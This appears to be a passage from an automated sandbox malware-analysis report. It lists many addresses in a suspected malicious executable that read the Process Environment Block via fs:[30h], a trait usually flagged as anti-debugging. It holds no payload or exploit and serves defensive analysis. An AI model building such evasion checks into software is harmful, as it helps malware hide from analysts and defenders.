                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F83C0 mov eax, dword ptr fs:[00000030h]2_2_019F83C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA3C0 mov eax, dword ptr fs:[00000030h]2_2_019FA3C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA3C0 mov eax, dword ptr fs:[00000030h]2_2_019FA3C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA3C0 mov eax, dword ptr fs:[00000030h]2_2_019FA3C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA3C0 mov eax, dword ptr fs:[00000030h]2_2_019FA3C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA3C0 mov eax, dword ptr fs:[00000030h]2_2_019FA3C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA3C0 mov eax, dword ptr fs:[00000030h]2_2_019FA3C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AAC3CD mov eax, dword ptr fs:[00000030h]2_2_01AAC3CD
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A763C0 mov eax, dword ptr fs:[00000030h]2_2_01A763C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9E3DB mov eax, dword ptr fs:[00000030h]2_2_01A9E3DB
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9E3DB mov eax, dword ptr fs:[00000030h]2_2_01A9E3DB
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9E3DB mov ecx, dword ptr fs:[00000030h]2_2_01A9E3DB
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9E3DB mov eax, dword ptr fs:[00000030h]2_2_01A9E3DB
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A943D4 mov eax, dword ptr fs:[00000030h]2_2_01A943D4
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A943D4 mov eax, dword ptr fs:[00000030h]2_2_01A943D4
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EC310 mov ecx, dword ptr fs:[00000030h]2_2_019EC310
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2A30B mov eax, dword ptr fs:[00000030h]2_2_01A2A30B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2A30B mov eax, dword ptr fs:[00000030h]2_2_01A2A30B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2A30B mov eax, dword ptr fs:[00000030h]2_2_01A2A30B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A10310 mov ecx, dword ptr fs:[00000030h]2_2_01A10310
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9437C mov eax, dword ptr fs:[00000030h]2_2_01A9437C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01ABA352 mov eax, dword ptr fs:[00000030h]2_2_01ABA352
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A98350 mov ecx, dword ptr fs:[00000030h]2_2_01A98350
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7035C mov eax, dword ptr fs:[00000030h]2_2_01A7035C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7035C mov eax, dword ptr fs:[00000030h]2_2_01A7035C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7035C mov eax, dword ptr fs:[00000030h]2_2_01A7035C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7035C mov ecx, dword ptr fs:[00000030h]2_2_01A7035C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7035C mov eax, dword ptr fs:[00000030h]2_2_01A7035C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7035C mov eax, dword ptr fs:[00000030h]2_2_01A7035C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A002A0 mov eax, dword ptr fs:[00000030h]2_2_01A002A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A002A0 mov eax, dword ptr fs:[00000030h]2_2_01A002A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A862A0 mov eax, dword ptr fs:[00000030h]2_2_01A862A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A862A0 mov ecx, dword ptr fs:[00000030h]2_2_01A862A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A862A0 mov eax, dword ptr fs:[00000030h]2_2_01A862A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A862A0 mov eax, dword ptr fs:[00000030h]2_2_01A862A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A862A0 mov eax, dword ptr fs:[00000030h]2_2_01A862A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A862A0 mov eax, dword ptr fs:[00000030h]2_2_01A862A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A70283 mov eax, dword ptr fs:[00000030h]2_2_01A70283
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A70283 mov eax, dword ptr fs:[00000030h]2_2_01A70283
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A70283 mov eax, dword ptr fs:[00000030h]2_2_01A70283
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E284 mov eax, dword ptr fs:[00000030h]2_2_01A2E284
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E284 mov eax, dword ptr fs:[00000030h]2_2_01A2E284
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A002E1 mov eax, dword ptr fs:[00000030h]2_2_01A002E1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A002E1 mov eax, dword ptr fs:[00000030h]2_2_01A002E1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A002E1 mov eax, dword ptr fs:[00000030h]2_2_01A002E1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA2C3 mov eax, dword ptr fs:[00000030h]2_2_019FA2C3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA2C3 mov eax, dword ptr fs:[00000030h]2_2_019FA2C3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA2C3 mov eax, dword ptr fs:[00000030h]2_2_019FA2C3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA2C3 mov eax, dword ptr fs:[00000030h]2_2_019FA2C3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA2C3 mov eax, dword ptr fs:[00000030h]2_2_019FA2C3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019E823B mov eax, dword ptr fs:[00000030h]2_2_019E823B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F6259 mov eax, dword ptr fs:[00000030h]2_2_019F6259
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EA250 mov eax, dword ptr fs:[00000030h]2_2_019EA250
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A78243 mov eax, dword ptr fs:[00000030h]2_2_01A78243
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A78243 mov ecx, dword ptr fs:[00000030h]2_2_01A78243
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019E826B mov eax, dword ptr fs:[00000030h]2_2_019E826B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AAA250 mov eax, dword ptr fs:[00000030h]2_2_01AAA250
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AAA250 mov eax, dword ptr fs:[00000030h]2_2_01AAA250
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F4260 mov eax, dword ptr fs:[00000030h]2_2_019F4260
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F4260 mov eax, dword ptr fs:[00000030h]2_2_019F4260
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F4260 mov eax, dword ptr fs:[00000030h]2_2_019F4260
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A705A7 mov eax, dword ptr fs:[00000030h]2_2_01A705A7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A705A7 mov eax, dword ptr fs:[00000030h]2_2_01A705A7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A705A7 mov eax, dword ptr fs:[00000030h]2_2_01A705A7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A145B1 mov eax, dword ptr fs:[00000030h]2_2_01A145B1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A145B1 mov eax, dword ptr fs:[00000030h]2_2_01A145B1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F2582 mov eax, dword ptr fs:[00000030h]2_2_019F2582
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F2582 mov ecx, dword ptr fs:[00000030h]2_2_019F2582
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A24588 mov eax, dword ptr fs:[00000030h]2_2_01A24588
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E59C mov eax, dword ptr fs:[00000030h]2_2_01A2E59C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E5E7 mov eax, dword ptr fs:[00000030h]2_2_01A1E5E7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E5E7 mov eax, dword ptr fs:[00000030h]2_2_01A1E5E7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E5E7 mov eax, dword ptr fs:[00000030h]2_2_01A1E5E7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E5E7 mov eax, dword ptr fs:[00000030h]2_2_01A1E5E7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E5E7 mov eax, dword ptr fs:[00000030h]2_2_01A1E5E7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E5E7 mov eax, dword ptr fs:[00000030h]2_2_01A1E5E7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E5E7 mov eax, dword ptr fs:[00000030h]2_2_01A1E5E7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E5E7 mov eax, dword ptr fs:[00000030h]2_2_01A1E5E7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F65D0 mov eax, dword ptr fs:[00000030h]2_2_019F65D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2C5ED mov eax, dword ptr fs:[00000030h]2_2_01A2C5ED
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2C5ED mov eax, dword ptr fs:[00000030h]2_2_01A2C5ED
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E5CF mov eax, dword ptr fs:[00000030h]2_2_01A2E5CF
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E5CF mov eax, dword ptr fs:[00000030h]2_2_01A2E5CF
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2A5D0 mov eax, dword ptr fs:[00000030h]2_2_01A2A5D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2A5D0 mov eax, dword ptr fs:[00000030h]2_2_01A2A5D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F25E0 mov eax, dword ptr fs:[00000030h]2_2_019F25E0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00535 mov eax, dword ptr fs:[00000030h]2_2_01A00535
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00535 mov eax, dword ptr fs:[00000030h]2_2_01A00535
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00535 mov eax, dword ptr fs:[00000030h]2_2_01A00535
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00535 mov eax, dword ptr fs:[00000030h]2_2_01A00535
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00535 mov eax, dword ptr fs:[00000030h]2_2_01A00535
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00535 mov eax, dword ptr fs:[00000030h]2_2_01A00535
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E53E mov eax, dword ptr fs:[00000030h]2_2_01A1E53E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E53E mov eax, dword ptr fs:[00000030h]2_2_01A1E53E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E53E mov eax, dword ptr fs:[00000030h]2_2_01A1E53E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E53E mov eax, dword ptr fs:[00000030h]2_2_01A1E53E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E53E mov eax, dword ptr fs:[00000030h]2_2_01A1E53E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A86500 mov eax, dword ptr fs:[00000030h]2_2_01A86500
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AC4500 mov eax, dword ptr fs:[00000030h]2_2_01AC4500
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AC4500 mov eax, dword ptr fs:[00000030h]2_2_01AC4500
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AC4500 mov eax, dword ptr fs:[00000030h]2_2_01AC4500
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AC4500 mov eax, dword ptr fs:[00000030h]2_2_01AC4500
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AC4500 mov eax, dword ptr fs:[00000030h]2_2_01AC4500
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AC4500 mov eax, dword ptr fs:[00000030h]2_2_01AC4500
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AC4500 mov eax, dword ptr fs:[00000030h]2_2_01AC4500
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2656A mov eax, dword ptr fs:[00000030h]2_2_01A2656A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2656A mov eax, dword ptr fs:[00000030h]2_2_01A2656A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2656A mov eax, dword ptr fs:[00000030h]2_2_01A2656A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F8550 mov eax, dword ptr fs:[00000030h]2_2_019F8550
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F8550 mov eax, dword ptr fs:[00000030h]2_2_019F8550
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A244B0 mov ecx, dword ptr fs:[00000030h]2_2_01A244B0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7A4B0 mov eax, dword ptr fs:[00000030h]2_2_01A7A4B0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AAA49A mov eax, dword ptr fs:[00000030h]2_2_01AAA49A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F64AB mov eax, dword ptr fs:[00000030h]2_2_019F64AB
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F04E5 mov ecx, dword ptr fs:[00000030h]2_2_019F04E5
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A76420 mov eax, dword ptr fs:[00000030h]2_2_01A76420
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A76420 mov eax, dword ptr fs:[00000030h]2_2_01A76420
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A76420 mov eax, dword ptr fs:[00000030h]2_2_01A76420
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A76420 mov eax, dword ptr fs:[00000030h]2_2_01A76420
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A76420 mov eax, dword ptr fs:[00000030h]2_2_01A76420
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A76420 mov eax, dword ptr fs:[00000030h]2_2_01A76420
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A76420 mov eax, dword ptr fs:[00000030h]2_2_01A76420
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2A430 mov eax, dword ptr fs:[00000030h]2_2_01A2A430
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A28402 mov eax, dword ptr fs:[00000030h]2_2_01A28402
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A28402 mov eax, dword ptr fs:[00000030h]2_2_01A28402
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A28402 mov eax, dword ptr fs:[00000030h]2_2_01A28402
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EC427 mov eax, dword ptr fs:[00000030h]2_2_019EC427
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EE420 mov eax, dword ptr fs:[00000030h]2_2_019EE420
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EE420 mov eax, dword ptr fs:[00000030h]2_2_019EE420
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EE420 mov eax, dword ptr fs:[00000030h]2_2_019EE420
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019E645D mov eax, dword ptr fs:[00000030h]2_2_019E645D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7C460 mov ecx, dword ptr fs:[00000030h]2_2_01A7C460
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1A470 mov eax, dword ptr fs:[00000030h]2_2_01A1A470
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1A470 mov eax, dword ptr fs:[00000030h]2_2_01A1A470
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1A470 mov eax, dword ptr fs:[00000030h]2_2_01A1A470
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E443 mov eax, dword ptr fs:[00000030h]2_2_01A2E443
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E443 mov eax, dword ptr fs:[00000030h]2_2_01A2E443
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E443 mov eax, dword ptr fs:[00000030h]2_2_01A2E443
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E443 mov eax, dword ptr fs:[00000030h]2_2_01A2E443
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E443 mov eax, dword ptr fs:[00000030h]2_2_01A2E443
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E443 mov eax, dword ptr fs:[00000030h]2_2_01A2E443
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E443 mov eax, dword ptr fs:[00000030h]2_2_01A2E443
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E443 mov eax, dword ptr fs:[00000030h]2_2_01A2E443
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1245A mov eax, dword ptr fs:[00000030h]2_2_01A1245A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AAA456 mov eax, dword ptr fs:[00000030h]2_2_01AAA456
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA47A0 mov eax, dword ptr fs:[00000030h]2_2_01AA47A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9678E mov eax, dword ptr fs:[00000030h]2_2_01A9678E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F07AF mov eax, dword ptr fs:[00000030h]2_2_019F07AF
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7E7E1 mov eax, dword ptr fs:[00000030h]2_2_01A7E7E1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A127ED mov eax, dword ptr fs:[00000030h]2_2_01A127ED
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A127ED mov eax, dword ptr fs:[00000030h]2_2_01A127ED
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A127ED mov eax, dword ptr fs:[00000030h]2_2_01A127ED
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FC7C0 mov eax, dword ptr fs:[00000030h]2_2_019FC7C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F47FB mov eax, dword ptr fs:[00000030h]2_2_019F47FB
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F47FB mov eax, dword ptr fs:[00000030h]2_2_019F47FB
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A707C3 mov eax, dword ptr fs:[00000030h]2_2_01A707C3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2C720 mov eax, dword ptr fs:[00000030h]2_2_01A2C720
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2C720 mov eax, dword ptr fs:[00000030h]2_2_01A2C720
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F0710 mov eax, dword ptr fs:[00000030h]2_2_019F0710
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6C730 mov eax, dword ptr fs:[00000030h]2_2_01A6C730
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2273C mov eax, dword ptr fs:[00000030h]2_2_01A2273C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2273C mov ecx, dword ptr fs:[00000030h]2_2_01A2273C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2273C mov eax, dword ptr fs:[00000030h]2_2_01A2273C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2C700 mov eax, dword ptr fs:[00000030h]2_2_01A2C700
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A20710 mov eax, dword ptr fs:[00000030h]2_2_01A20710
